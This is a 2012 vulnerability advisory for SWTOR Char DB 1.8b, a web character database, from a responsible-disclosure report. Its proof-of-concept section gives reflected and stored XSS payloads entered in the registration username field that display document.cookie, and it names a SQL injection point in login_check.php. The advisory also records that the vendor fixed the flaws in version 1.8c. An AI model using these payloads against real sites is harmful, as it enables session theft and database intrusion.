Advisory:		Star Wars Old Republic - SWTOR Char DB 1.8b Multiple security vulnerabilities
Advisory ID:		SSCHADV2012-009
Author:			Stefan Schurtz
Affected Software:	Successfully tested on Star Wars Old Republic - SWTOR Char DB 1.8b
Vendor URL:		http://swtorphpdb.sourceforge.net/
Vendor Status:		fixed
OSVDB ID:		80841, 80842

==========================
Vulnerability Description
==========================

SWTOR Char DB 1.8b is prone to multiple security vulnerabilities

==================
PoC-Exploit
==================

// XSS
http://[target]/swtor/user/register.php
Username: <script>alert(document.cookie)</script>
Password: whatever

// Stored XSS
http://[target]/swtor/user/register.php
Username: 1-->1<ScRiPt >alert(document.cookie)</ScRiPt><!--
Password: whatever

Visit: http://[target]/swtor/index.php?view=members

// SQL-Injection
http://[target]/swtor/user/login_check.php?swtorpw=1&swtorun=[sql injection]

=========
Solution
=========

Update to the latest version

====================
Disclosure Timeline
====================

17-Mar-2012 - vendor informed (contact form)
25-Mar-2012 - fixed in Version 1.8c

========
Credits
========

Vulnerabilities found and advisory written by Stefan Schurtz.

===========
References
===========

http://www.darksecurity.de/advisories/2012/SSCHADV2012-009.txt
http://osvdb.org/show/osvdb/80841
http://osvdb.org/show/osvdb/80842